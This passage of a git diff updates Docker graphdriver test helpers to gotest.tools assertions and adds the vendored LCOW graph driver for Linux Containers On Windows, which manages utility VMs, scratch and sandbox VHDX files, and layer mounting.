+	assert.Check(t, is.Equal(mode&os.ModeSetuid, actual&os.ModeSetuid), path)
+	assert.Check(t, is.Equal(mode&os.ModeSetgid, actual&os.ModeSetgid), path)
 
 	if stat, ok := fi.Sys().(*syscall.Stat_t); ok {
-		if stat.Uid != uid {
-			t.Fatalf("%s no owned by uid %d", path, uid)
-		}
-		if stat.Gid != gid {
-			t.Fatalf("%s not owned by gid %d", path, gid)
-		}
+		assert.Check(t, is.Equal(uid, stat.Uid), path)
+		assert.Check(t, is.Equal(gid, stat.Gid), path)
 	}
 }
 
 func createBase(t testing.TB, driver graphdriver.Driver, name string) {
 	// We need to be able to set any perms
-	oldmask := syscall.Umask(0)
-	defer syscall.Umask(oldmask)
+	oldmask := unix.Umask(0)
+	defer unix.Umask(oldmask)
 
-	if err := driver.CreateReadWrite(name, "", nil); err != nil {
-		t.Fatal(err)
-	}
+	err := driver.CreateReadWrite(name, "", nil)
+	assert.NilError(t, err)
 
-	dir, err := driver.Get(name, "")
-	if err != nil {
-		t.Fatal(err)
-	}
+	dirFS, err := driver.Get(name, "")
+	assert.NilError(t, err)
 	defer driver.Put(name)
 
-	subdir := path.Join(dir, "a subdir")
-	if err := os.Mkdir(subdir, 0705|os.ModeSticky); err != nil {
-		t.Fatal(err)
-	}
-	if err := os.Chown(subdir, 1, 2); err != nil {
-		t.Fatal(err)
-	}
+	subdir := dirFS.Join(dirFS.Path(), "a subdir")
+	assert.NilError(t, dirFS.Mkdir(subdir, 0705|os.ModeSticky))
+	assert.NilError(t, dirFS.Lchown(subdir, 1, 2))
 
-	file := path.Join(dir, "a file")
-	if err := ioutil.WriteFile(file, []byte("Some data"), 0222|os.ModeSetuid); err != nil {
-		t.Fatal(err)
-	}
+	file := dirFS.Join(dirFS.Path(), "a file")
+	err = contdriver.WriteFile(dirFS, file, []byte("Some data"), 0222|os.ModeSetuid)
+	assert.NilError(t, err)
 }
 
 func verifyBase(t testing.TB, driver graphdriver.Driver, name string) {
-	dir, err := driver.Get(name, "")
-	if err != nil {
-		t.Fatal(err)
-	}
+	dirFS, err := driver.Get(name, "")
+	assert.NilError(t, err)
 	defer driver.Put(name)
 
-	subdir := path.Join(dir, "a subdir")
+	subdir := dirFS.Join(dirFS.Path(), "a subdir")
 	verifyFile(t, subdir, 0705|os.ModeDir|os.ModeSticky, 1, 2)
 
-	file := path.Join(dir, "a file")
+	file := dirFS.Join(dirFS.Path(), "a file")
 	verifyFile(t, file, 0222|os.ModeSetuid, 0, 0)
 
-	fis, err := readDir(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(fis) != 2 {
-		t.Fatal("Unexpected files in base image")
-	}
-
+	files, err := readDir(dirFS, dirFS.Path())
+	assert.NilError(t, err)
+	assert.Check(t, is.Len(files, 2))
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go
new file mode 100644
index 0000000000..649beccdc6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go
@@ -0,0 +1,1052 @@
+// +build windows
+
+// Maintainer:  jhowardmsft
+// Locale:      en-gb
+// About:       Graph-driver for Linux Containers On Windows (LCOW)
+//
+// This graphdriver runs in two modes. Yet to be determined which one will
+// be the shipping mode. The global mode is where a single utility VM
+// is used for all service VM tool operations. This isn't safe security-wise
+// as it's attaching a sandbox of multiple containers to it, containing
+// untrusted data. This may be fine for client devops scenarios. In
+// safe mode, a unique utility VM is instantiated for all service VM tool
+// operations. The downside of safe-mode is that operations are slower as
+// a new service utility VM has to be started and torn-down when needed.
+//
+// Options:
+//
+// The following options are read by the graphdriver itself:
+//
+//   * lcow.globalmode - Enables global service VM Mode
+//        -- Possible values:     true/false
+//        -- Default if omitted:  false
+//
+//   * lcow.sandboxsize - Specifies a custom sandbox size in GB for starting a container
+//        -- Possible values:      >= default sandbox size (opengcs defined, currently 20)
+//        -- Default if omitted:  20
+//
+// The following options are read by opengcs:
+//
+//   * lcow.kirdpath - Specifies a custom path to a kernel/initrd pair
+//        -- Possible values:      Any local path that is not a mapped drive
+//        -- Default if omitted:  %ProgramFiles%\Linux Containers
+//
+//   * lcow.kernel - Specifies a custom kernel file located in the `lcow.kirdpath` path
+//        -- Possible values:      Any valid filename
+//        -- Default if omitted:  bootx64.efi
+//
+//   * lcow.initrd - Specifies a custom initrd file located in the `lcow.kirdpath` path
+//        -- Possible values:      Any valid filename
+//        -- Default if omitted:  initrd.img
+//
+//   * lcow.bootparameters - Specifies additional boot parameters for booting in kernel+initrd mode
+//        -- Possible values:      Any valid linux kernel boot options
+//        -- Default if omitted:  <nil>
+//
+//   * lcow.vhdx - Specifies a custom vhdx file to boot (instead of a kernel+initrd)
+//        -- Possible values:      Any valid filename
+//        -- Default if omitted:  uvm.vhdx under `lcow.kirdpath`
+//
+//   * lcow.timeout - Specifies a timeout for utility VM operations in seconds
+//        -- Possible values:      >=0
+//        -- Default if omitted:  300
+
+// TODO: Grab logs from SVM at terminate or errors
+
+package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow"
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/Microsoft/opengcs/client"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
+)
+
+// init registers this driver to the register. It gets initialised by the
+// function passed in the second parameter, implemented in this file.
+func init() {
+	graphdriver.Register("lcow", InitDriver)
+}
+
+const (
+	// sandboxFilename is the name of the file containing a layer's sandbox (read-write layer).
+	sandboxFilename = "sandbox.vhdx"
+
+	// scratchFilename is the name of the scratch-space used by an SVM to avoid running out of memory.
+	scratchFilename = "scratch.vhdx"
+
+	// layerFilename is the name of the file containing a layer's read-only contents.
+	// Note this really is VHD format, not VHDX.
+	layerFilename = "layer.vhd"
+
+	// toolsScratchPath is a location in a service utility VM that the tools can use as a
+	// scratch space to avoid running out of memory.
+	toolsScratchPath = "/tmp/scratch"
+
+	// svmGlobalID is the ID used in the serviceVMs map for the global service VM when running in "global" mode.
+	svmGlobalID = "_lcow_global_svm_"
+
+	// cacheDirectory is the sub-folder under the driver's data-root used to cache blank sandbox and scratch VHDs.
+	cacheDirectory = "cache"
+
+	// scratchDirectory is the sub-folder under the driver's data-root used for scratch VHDs in service VMs
+	scratchDirectory = "scratch"
+
+	// errOperationPending is the HRESULT returned by the HCS when the VM termination operation is still pending.
+	errOperationPending syscall.Errno = 0xc0370103
+)
+
+// Driver represents an LCOW graph driver.
+type Driver struct {
+	dataRoot           string     // Root path on the host where we are storing everything.
+	cachedSandboxFile  string     // Location of the local default-sized cached sandbox.
+	cachedSandboxMutex sync.Mutex // Protects race conditions from multiple threads creating the cached sandbox.
+	cachedScratchFile  string     // Location of the local cached empty scratch space.
+	cachedScratchMutex sync.Mutex // Protects race conditions from multiple threads creating the cached scratch.
+	options            []string   // Graphdriver options we are initialised with.
+	globalMode         bool       // Indicates if running in an unsafe/global service VM mode.
+
+	// NOTE: It is OK to use a cache here because Windows does not support
+	// restoring containers when the daemon dies.
+	serviceVms *serviceVMMap // Map of the configs representing the service VM(s) we are running.
+}
+
+// layerDetails is the structure returned by a helper function `getLayerDetails`
+// for getting information about a layer folder
+type layerDetails struct {
+	filename  string // \path\to\sandbox.vhdx or \path\to\layer.vhd
+	size      int64  // size of the above file
+	isSandbox bool   // true if sandbox.vhdx
+}
+
+// deletefiles is a helper function for initialisation where we delete any
+// left-over scratch files in case we were previously forcibly terminated.
+func deletefiles(path string, f os.FileInfo, err error) error {
+	if strings.HasSuffix(f.Name(), ".vhdx") {
+		logrus.Warnf("lcowdriver: init: deleting stale scratch file %s", path)
+		return os.Remove(path)
+	}
+	return nil
+}
+
+// InitDriver returns a new LCOW storage driver.
+func InitDriver(dataRoot string, options []string, _, _ []idtools.IDMap) (graphdriver.Driver, error) {
+	title := "lcowdriver: init:"
+
+	cd := filepath.Join(dataRoot, cacheDirectory)
+	sd := filepath.Join(dataRoot, scratchDirectory)
+
+	d := &Driver{
+		dataRoot:          dataRoot,
+		options:           options,
+		cachedSandboxFile: filepath.Join(cd, sandboxFilename),
+		cachedScratchFile: filepath.Join(cd, scratchFilename),
+		serviceVms: &serviceVMMap{
+			svms: make(map[string]*serviceVMMapItem),
+		},
+		globalMode: false,
+	}
+
+	// Looks for relevant options
+	for _, v := range options {
+		opt := strings.SplitN(v, "=", 2)
+		if len(opt) == 2 {
+			switch strings.ToLower(opt[0]) {
+			case "lcow.globalmode":
+				var err error
+				d.globalMode, err = strconv.ParseBool(opt[1])
+				if err != nil {
+					return nil, fmt.Errorf("%s failed to parse value for 'lcow.globalmode' - must be 'true' or 'false'", title)
+				}
+				break
+			}
+		}
+	}
+
+	// Make sure the dataRoot directory is created
+	if err := idtools.MkdirAllAndChown(dataRoot, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil {
+		return nil, fmt.Errorf("%s failed to create '%s': %v", title, dataRoot, err)
+	}
+
+	// Make sure the cache directory is created under dataRoot
+	if err := idtools.MkdirAllAndChown(cd, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil {
+		return nil, fmt.Errorf("%s failed to create '%s': %v", title, cd, err)
+	}
+
+	// Make sure the scratch directory is created under dataRoot
+	if err := idtools.MkdirAllAndChown(sd, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil {
+		return nil, fmt.Errorf("%s failed to create '%s': %v", title, sd, err)
+	}
+
+	// Delete any items in the scratch directory
+	filepath.Walk(sd, deletefiles)
+
+	logrus.Infof("%s dataRoot: %s globalMode: %t", title, dataRoot, d.globalMode)
+
+	return d, nil
+}
+
+func (d *Driver) getVMID(id string) string {
+	if d.globalMode {
+		return svmGlobalID
+	}
+	return id
+}
+
+// startServiceVMIfNotRunning starts a service utility VM if it is not currently running.
+// It can optionally be started with a mapped virtual disk. Returns a opengcs config structure
+// representing the VM.
+func (d *Driver) startServiceVMIfNotRunning(id string, mvdToAdd []hcsshim.MappedVirtualDisk, context string) (_ *serviceVM, err error) {
+	// Use the global ID if in global mode
+	id = d.getVMID(id)
+
+	title := fmt.Sprintf("lcowdriver: startservicevmifnotrunning %s:", id)
+
+	// Attempt to add ID to the service vm map
+	logrus.Debugf("%s: Adding entry to service vm map", title)
+	svm, exists, err := d.serviceVms.add(id)
+	if err != nil && err == errVMisTerminating {
+		// VM is in the process of terminating. Wait until it's done and and then try again
+		logrus.Debugf("%s: VM with current ID still in the process of terminating: %s", title, id)
+		if err := svm.getStopError(); err != nil {
+			logrus.Debugf("%s: VM %s did not stop successfully: %s", title, id, err)
+			return nil, err
+		}
+		return d.startServiceVMIfNotRunning(id, mvdToAdd, context)
+	} else if err != nil {
+		logrus.Debugf("%s: failed to add service vm to map: %s", err)
+		return nil, fmt.Errorf("%s: failed to add to service vm map: %s", title, err)
+	}
+
+	if exists {
+		// Service VM is already up and running. In this case, just hot add the vhds.
+		logrus.Debugf("%s: service vm already exists. Just hot adding: %+v", title, mvdToAdd)
+		if err := svm.hotAddVHDs(mvdToAdd...); err != nil {
+			logrus.Debugf("%s: failed to hot add vhds on service vm creation: %s", title, err)
+			return nil, fmt.Errorf("%s: failed to hot add vhds on service vm: %s", title, err)
+		}
+		return svm, nil
+	}
+
+	// We are the first service for this id, so we need to start it
+	logrus.Debugf("%s: service vm doesn't exist. Now starting it up: %s", title, id)
+
+	defer func() {
+		// Signal that start has finished, passing in the error if any.
+		svm.signalStartFinished(err)
+		if err != nil {
+			// We added a ref to the VM, since we failed, we should delete the ref.
+			d.terminateServiceVM(id, "error path on startServiceVMIfNotRunning", false)
+		}
+	}()
+
+	// Generate a default configuration
+	if err := svm.config.GenerateDefault(d.options); err != nil {
+		return nil, fmt.Errorf("%s failed to generate default gogcs configuration for global svm (%s): %s", title, context, err)
+	}
+
+	// For the name, we deliberately suffix if safe-mode to ensure that it doesn't
+	// clash with another utility VM which may be running for the container itself.
+	// This also makes it easier to correlate through Get-ComputeProcess.
+	if id == svmGlobalID {
+		svm.config.Name = svmGlobalID
+	} else {
+		svm.config.Name = fmt.Sprintf("%s_svm", id)
+	}
+
+	// Ensure we take the cached scratch mutex around the check to ensure the file is complete
+	// and not in the process of being created by another thread.
+	scratchTargetFile := filepath.Join(d.dataRoot, scratchDirectory, fmt.Sprintf("%s.vhdx", id))
+
+	logrus.Debugf("%s locking cachedScratchMutex", title)
+	d.cachedScratchMutex.Lock()
+	if _, err := os.Stat(d.cachedScratchFile); err == nil {
+		// Make a copy of cached scratch to the scratch directory
+		logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) cloning cached scratch for mvd", context)
+		if err := client.CopyFile(d.cachedScratchFile, scratchTargetFile, true); err != nil {
+			logrus.Debugf("%s releasing cachedScratchMutex on err: %s", title, err)
+			d.cachedScratchMutex.Unlock()
+			return nil, err
+		}
+
+		// Add the cached clone as a mapped virtual disk
+		logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) adding cloned scratch as mvd", context)
+		mvd := hcsshim.MappedVirtualDisk{
+			HostPath:          scratchTargetFile,
+			ContainerPath:     toolsScratchPath,
+			CreateInUtilityVM: true,
+		}
+		svm.config.MappedVirtualDisks = append(svm.config.MappedVirtualDisks, mvd)
+		svm.scratchAttached = true
+	}
+
+	logrus.Debugf("%s releasing cachedScratchMutex", title)
+	d.cachedScratchMutex.Unlock()
+
+	// If requested to start it with a mapped virtual disk, add it now.
+	svm.config.MappedVirtualDisks = append(svm.config.MappedVirtualDisks, mvdToAdd...)
+	for _, mvd := range svm.config.MappedVirtualDisks {
+		svm.attachedVHDs[mvd.HostPath] = 1
+	}
+
+	// Start it.
+	logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) starting %s", context, svm.config.Name)
+	if err := svm.config.StartUtilityVM(); err != nil {
+		return nil, fmt.Errorf("failed to start service utility VM (%s): %s", context, err)
+	}
+
+	// defer function to terminate the VM if the next steps fail
+	defer func() {
+		if err != nil {
+			waitTerminate(svm, fmt.Sprintf("startServiceVmIfNotRunning: %s (%s)", id, context))
+		}
+	}()
+
+	// Now we have a running service VM, we can create the cached scratch file if it doesn't exist.
+	logrus.Debugf("%s locking cachedScratchMutex", title)
+	d.cachedScratchMutex.Lock()
+	if _, err := os.Stat(d.cachedScratchFile); err != nil {
+		logrus.Debugf("%s (%s): creating an SVM scratch", title, context)
+
+		// Don't use svm.CreateExt4Vhdx since that only works when the service vm is setup,
+		// but we're still in that process right now.
+		if err := svm.config.CreateExt4Vhdx(scratchTargetFile, client.DefaultVhdxSizeGB, d.cachedScratchFile); err != nil {
+			logrus.Debugf("%s (%s): releasing cachedScratchMutex on error path", title, context)
+			d.cachedScratchMutex.Unlock()
+			logrus.Debugf("%s: failed to create vm scratch %s: %s", title, scratchTargetFile, err)
+			return nil, fmt.Errorf("failed to create SVM scratch VHDX (%s): %s", context, err)
+		}
+	}
+	logrus.Debugf("%s (%s): releasing cachedScratchMutex", title, context)
+	d.cachedScratchMutex.Unlock()
+
+	// Hot-add the scratch-space if not already attached
+	if !svm.scratchAttached {
+		logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) hot-adding scratch %s", context, scratchTargetFile)
+		if err := svm.hotAddVHDsAtStart(hcsshim.MappedVirtualDisk{
+			HostPath:          scratchTargetFile,
+			ContainerPath:     toolsScratchPath,
+			CreateInUtilityVM: true,
+		}); err != nil {
+			logrus.Debugf("%s: failed to hot-add scratch %s: %s", title, scratchTargetFile, err)
+			return nil, fmt.Errorf("failed to hot-add %s failed: %s", scratchTargetFile, err)
+		}
+		svm.scratchAttached = true
+	}
+
+	logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) success", context)
+	return svm, nil
+}
+
+// terminateServiceVM terminates a service utility VM if its running if it's,
+// not being used by any goroutine, but does nothing when in global mode as it's
+// lifetime is limited to that of the daemon. If the force flag is set, then
+// the VM will be killed regardless of the ref count or if it's global.
+func (d *Driver) terminateServiceVM(id, context string, force bool) (err error) {
+	// We don't do anything in safe mode unless the force flag has been passed, which
+	// is only the case for cleanup at driver termination.
+	if d.globalMode && !force {
+		logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - doing nothing as in global mode", id, context)
+		return nil
+	}
+
+	id = d.getVMID(id)
+
+	var svm *serviceVM
+	var lastRef bool
+	if !force {
+		// In the not force case, we ref count
+		svm, lastRef, err = d.serviceVms.decrementRefCount(id)
+	} else {
+		// In the force case, we ignore the ref count and just set it to 0
+		svm, err = d.serviceVms.setRefCountZero(id)
+		lastRef = true
+	}
+
+	if err == errVMUnknown {
+		return nil
+	} else if err == errVMisTerminating {
+		return svm.getStopError()
+	} else if !lastRef {
+		return nil
+	}
+
+	// We run the deletion of the scratch as a deferred function to at least attempt
+	// clean-up in case of errors.
+	defer func() {
+		if svm.scratchAttached {
+			scratchTargetFile := filepath.Join(d.dataRoot, scratchDirectory, fmt.Sprintf("%s.vhdx", id))
+			logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - deleting scratch %s", id, context, scratchTargetFile)
+			if errRemove := os.Remove(scratchTargetFile); errRemove != nil {
+				logrus.Warnf("failed to remove scratch file %s (%s): %s", scratchTargetFile, context, errRemove)
+				err = errRemove
+			}
+		}
+
+		// This function shouldn't actually return error unless there is a bug
+		if errDelete := d.serviceVms.deleteID(id); errDelete != nil {
+			logrus.Warnf("failed to service vm from svm map %s (%s): %s", id, context, errDelete)
+		}
+
+		// Signal that this VM has stopped
+		svm.signalStopFinished(err)
+	}()
+
+	// Now it's possible that the service VM failed to start and now we are trying to terminate it.
+	// In this case, we will relay the error to the goroutines waiting for this vm to stop.
+	if err := svm.getStartError(); err != nil {
+		logrus.Debugf("lcowdriver: terminateservicevm: %s had failed to start up: %s", id, err)
+		return err
+	}
+
+	if err := waitTerminate(svm, fmt.Sprintf("terminateservicevm: %s (%s)", id, context)); err != nil {
+		return err
+	}
+
+	logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - success", id, context)
+	return nil
+}
+
+func waitTerminate(svm *serviceVM, context string) error {
+	if svm.config == nil {
+		return fmt.Errorf("lcowdriver: waitTermiante: Nil utility VM. %s", context)
+	}
+
+	logrus.Debugf("lcowdriver: waitTerminate: Calling terminate: %s", context)
+	if err := svm.config.Uvm.Terminate(); err != nil {
+		// We might get operation still pending from the HCS. In that case, we shouldn't return
+		// an error since we call wait right after.
+		underlyingError := err
+		if conterr, ok := err.(*hcsshim.ContainerError); ok {
+			underlyingError = conterr.Err
+		}
+
+		if syscallErr, ok := underlyingError.(syscall.Errno); ok {
+			underlyingError = syscallErr
+		}
+
+		if underlyingError != errOperationPending {
+			return fmt.Errorf("failed to terminate utility VM (%s): %s", context, err)
+		}
+		logrus.Debugf("lcowdriver: waitTerminate: uvm.Terminate() returned operation pending (%s)", context)
+	}
+
+	logrus.Debugf("lcowdriver: waitTerminate: (%s) - waiting for utility VM to terminate", context)
+	if err := svm.config.Uvm.WaitTimeout(time.Duration(svm.config.UvmTimeoutSeconds) * time.Second); err != nil {
+		return fmt.Errorf("failed waiting for utility VM to terminate (%s): %s", context, err)
+	}
+	return nil
+}
+
+// String returns the string representation of a driver. This should match
+// the name the graph driver has been registered with.
+func (d *Driver) String() string {
+	return "lcow"
+}
+
+// Status returns the status of the driver.
+func (d *Driver) Status() [][2]string {
+	return [][2]string{
+		{"LCOW", ""},
+		// TODO: Add some more info here - mode, home, ....
+	}
+}
+
+// Exists returns true if the given id is registered with this driver.
+func (d *Driver) Exists(id string) bool {
+	_, err := os.Lstat(d.dir(id))
+	logrus.Debugf("lcowdriver: exists: id %s %t", id, err == nil)
+	return err == nil
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system. That equates to creating a sandbox.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	title := fmt.Sprintf("lcowdriver: createreadwrite: id %s", id)
+	logrus.Debugf(title)
+
+	// First we need to create the folder
+	if err := d.Create(id, parent, opts); err != nil {
+		return err
+	}
+
+	// Look for an explicit sandbox size option.
+	sandboxSize := uint64(client.DefaultVhdxSizeGB)
+	for k, v := range opts.StorageOpt {
+		switch strings.ToLower(k) {
+		case "lcow.sandboxsize":
+			var err error
+			sandboxSize, err = strconv.ParseUint(v, 10, 32)
+			if err != nil {
+				return fmt.Errorf("%s failed to parse value '%s' for 'lcow.sandboxsize'", title, v)
+			}
+			if sandboxSize < client.DefaultVhdxSizeGB {
+				return fmt.Errorf("%s 'lcow.sandboxsize' option cannot be less than %d", title, client.DefaultVhdxSizeGB)
+			}
+			break
+		}
+	}
+
+	// Massive perf optimisation here. If we know that the RW layer is the default size,
+	// and that the cached sandbox already exists, and we are running in safe mode, we
+	// can just do a simple copy into the layers sandbox file without needing to start a
+	// unique service VM. For a global service VM, it doesn't really matter. Of course,
+	// this is only the case where the sandbox is the default size.
+	//
+	// Make sure we have the sandbox mutex taken while we are examining it.
+	if sandboxSize == client.DefaultVhdxSizeGB {
+		logrus.Debugf("%s: locking cachedSandboxMutex", title)
+		d.cachedSandboxMutex.Lock()
+		_, err := os.Stat(d.cachedSandboxFile)
+		logrus.Debugf("%s: releasing cachedSandboxMutex", title)
+		d.cachedSandboxMutex.Unlock()
+		if err == nil {
+			logrus.Debugf("%s: using cached sandbox to populate", title)
+			if err := client.CopyFile(d.cachedSandboxFile, filepath.Join(d.dir(id), sandboxFilename), true); err != nil {
+				return err
+			}
+			return nil
+		}
+	}
+
+	logrus.Debugf("%s: creating SVM to create sandbox", title)
+	svm, err := d.startServiceVMIfNotRunning(id, nil, "createreadwrite")
+	if err != nil {
+		return err
+	}
+	defer d.terminateServiceVM(id, "createreadwrite", false)
+
+	// So the sandbox needs creating. If default size ensure we are the only thread populating the cache.
+	// Non-default size we don't store, just create them one-off so no need to lock the cachedSandboxMutex.
+	if sandboxSize == client.DefaultVhdxSizeGB {
+		logrus.Debugf("%s: locking cachedSandboxMutex for creation", title)
+		d.cachedSandboxMutex.Lock()
+		defer func() {
+			logrus.Debugf("%s: releasing cachedSandboxMutex for creation", title)
+			d.cachedSandboxMutex.Unlock()
+		}()
+	}
+
+	// Make sure we don't write to our local cached copy if this is for a non-default size request.
+	targetCacheFile := d.cachedSandboxFile
+	if sandboxSize != client.DefaultVhdxSizeGB {
+		targetCacheFile = ""
+	}
+
+	// Create the ext4 vhdx
+	logrus.Debugf("%s: creating sandbox ext4 vhdx", title)
+	if err := svm.createExt4VHDX(filepath.Join(d.dir(id), sandboxFilename), uint32(sandboxSize), targetCacheFile); err != nil {
+		logrus.Debugf("%s: failed to create sandbox vhdx for %s: %s", title, id, err)
+		return err
+	}
+	return nil
+}
+
+// Create creates the folder for the layer with the given id, and
+// adds it to the layer chain.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+	logrus.Debugf("lcowdriver: create: id %s parent: %s", id, parent)
+
+	parentChain, err := d.getLayerChain(parent)
+	if err != nil {
+		return err
+	}
+
+	var layerChain []string
+	if parent != "" {
+		if !d.Exists(parent) {
+			return fmt.Errorf("lcowdriver: cannot create layer folder with missing parent %s", parent)
+		}
+		layerChain = []string{d.dir(parent)}
+	}
+	layerChain = append(layerChain, parentChain...)
+
+	// Make sure layers are created with the correct ACL so that VMs can access them.
+	layerPath := d.dir(id)
+	logrus.Debugf("lcowdriver: create: id %s: creating %s", id, layerPath)
+	if err := system.MkdirAllWithACL(layerPath, 755, system.SddlNtvmAdministratorsLocalSystem); err != nil {
+		return err
+	}
+
+	if err := d.setLayerChain(id, layerChain); err != nil {
+		if err2 := os.RemoveAll(layerPath); err2 != nil {
+			logrus.Warnf("failed to remove layer %s: %s", layerPath, err2)
+		}
+		return err
+	}
+	logrus.Debugf("lcowdriver: create: id %s: success", id)
+
+	return nil
+}
+
+// Remove unmounts and removes the dir information.
+func (d *Driver) Remove(id string) error {
+	logrus.Debugf("lcowdriver: remove: id %s", id)
+	tmpID := fmt.Sprintf("%s-removing", id)
+	tmpLayerPath := d.dir(tmpID)
+	layerPath := d.dir(id)
+
+	logrus.Debugf("lcowdriver: remove: id %s: layerPath %s", id, layerPath)
+
+	// Unmount all the layers
+	err := d.Put(id)
+	if err != nil {
+		logrus.Debugf("lcowdriver: remove id %s: failed to unmount: %s", id, err)
+		return err
+	}
+
+	// for non-global case just kill the vm
+	if !d.globalMode {
+		if err := d.terminateServiceVM(id, fmt.Sprintf("Remove %s", id), true); err != nil {
+			return err
+		}
+	}
+
+	if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+
+	if err := os.RemoveAll(tmpLayerPath); err != nil {
+		return err
+	}
+
+	logrus.Debugf("lcowdriver: remove: id %s: layerPath %s succeeded", id, layerPath)
+	return nil
+}
+
+// Get returns the rootfs path for the id. It is reference counted and
+// effectively can be thought of as a "mount the layer into the utility
+// vm if it isn't already". The contract from the caller of this is that
+// all Gets and Puts are matched. It -should- be the case that on cleanup,
+// nothing is mounted.
+//
+// For optimisation, we don't actually mount the filesystem (which in our
+// case means [hot-]adding it to a service VM. But we track that and defer
+// the actual adding to the point we need to access it.
+func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) {
+	title := fmt.Sprintf("lcowdriver: get: %s", id)
+	logrus.Debugf(title)
+
+	// Generate the mounts needed for the defered operation.
+	disks, err := d.getAllMounts(id)
+	if err != nil {
+		logrus.Debugf("%s failed to get all layer details for %s: %s", title, d.dir(id), err)
+		return nil, fmt.Errorf("%s failed to get layer details for %s: %s", title, d.dir(id), err)
+	}
+
+	logrus.Debugf("%s: got layer mounts: %+v", title, disks)
+	return &lcowfs{
+		root:        unionMountName(disks),
+		d:           d,
+		mappedDisks: disks,
+		vmID:        d.getVMID(id),
+	}, nil
+}
+
+// Put does the reverse of get. If there are no more references to
+// the layer, it unmounts it from the utility VM.
+func (d *Driver) Put(id string) error {
+	title := fmt.Sprintf("lcowdriver: put: %s", id)
+
+	// Get the service VM that we need to remove from
+	svm, err := d.serviceVms.get(d.getVMID(id))
+	if err == errVMUnknown {
+		return nil
+	} else if err == errVMisTerminating {
+		return svm.getStopError()
+	}
+
+	// Generate the mounts that Get() might have mounted
+	disks, err := d.getAllMounts(id)
+	if err != nil {
+		logrus.Debugf("%s failed to get all layer details for %s: %s", title, d.dir(id), err)
+		return fmt.Errorf("%s failed to get layer details for %s: %s", title, d.dir(id), err)
+	}
+
+	// Now, we want to perform the unmounts, hot-remove and stop the service vm.
+	// We want to go though all the steps even if we have an error to clean up properly
+	err = svm.deleteUnionMount(unionMountName(disks), disks...)
+	if err != nil {
+		logrus.Debugf("%s failed to delete union mount %s: %s", title, id, err)
+	}
+
+	err1 := svm.hotRemoveVHDs(disks...)
+	if err1 != nil {
+		logrus.Debugf("%s failed to hot remove vhds %s: %s", title, id, err)
+		if err == nil {
+			err = err1
+		}
+	}
+
+	err1 = d.terminateServiceVM(id, fmt.Sprintf("Put %s", id), false)
+	if err1 != nil {
+		logrus.Debugf("%s failed to terminate service vm %s: %s", title, id, err1)
+		if err == nil {
+			err = err1
+		}
+	}
+	logrus.Debugf("Put succeeded on id %s", id)
+	return err
+}
+
+// Cleanup ensures the information the driver stores is properly removed.
+// We use this opportunity to cleanup any -removing folders which may be
+// still left if the daemon was killed while it was removing a layer.
+func (d *Driver) Cleanup() error {
+	title := "lcowdriver: cleanup"
+
+	items, err := ioutil.ReadDir(d.dataRoot)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+
+	// Note we don't return an error below - it's possible the files
+	// are locked. However, next time around after the daemon exits,
+	// we likely will be able to to cleanup successfully. Instead we log
+	// warnings if there are errors.
+	for _, item := range items {
+		if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") {
+			if err := os.RemoveAll(filepath.Join(d.dataRoot, item.Name())); err != nil {
+				logrus.Warnf("%s failed to cleanup %s: %s", title, item.Name(), err)
+			} else {
+				logrus.Infof("%s cleaned up %s", title, item.Name())
+			}
+		}
+	}
+
+	// Cleanup any service VMs we have running, along with their scratch spaces.
+	// We don't take the lock for this as it's taken in terminateServiceVm.
+	for k, v := range d.serviceVms.svms {
+		logrus.Debugf("%s svm entry: %s: %+v", title, k, v)
+		d.terminateServiceVM(k, "cleanup", true)
+	}
+
+	return nil
+}
+
+// Diff takes a layer (and it's parent layer which may be null, but
+// is ignored by this implementation below) and returns a reader for
+// a tarstream representing the layers contents. The id could be
+// a read-only "layer.vhd" or a read-write "sandbox.vhdx". The semantics
+// of this function dictate that the layer is already mounted.
+// However, as we do lazy mounting as a performance optimisation,
+// this will likely not be the case.
+func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) {
+	title := fmt.Sprintf("lcowdriver: diff: %s", id)
+
+	// Get VHDX info
+	ld, err := getLayerDetails(d.dir(id))
+	if err != nil {
+		logrus.Debugf("%s: failed to get vhdx information of %s: %s", title, d.dir(id), err)
+		return nil, err
+	}
+
+	// Start the SVM with a mapped virtual disk. Note that if the SVM is
+	// already running and we are in global mode, this will be
+	// hot-added.
+	mvd := hcsshim.MappedVirtualDisk{
+		HostPath:          ld.filename,
+		ContainerPath:     hostToGuest(ld.filename),
+		CreateInUtilityVM: true,
+		ReadOnly:          true,
+	}
+
+	logrus.Debugf("%s: starting service VM", title)
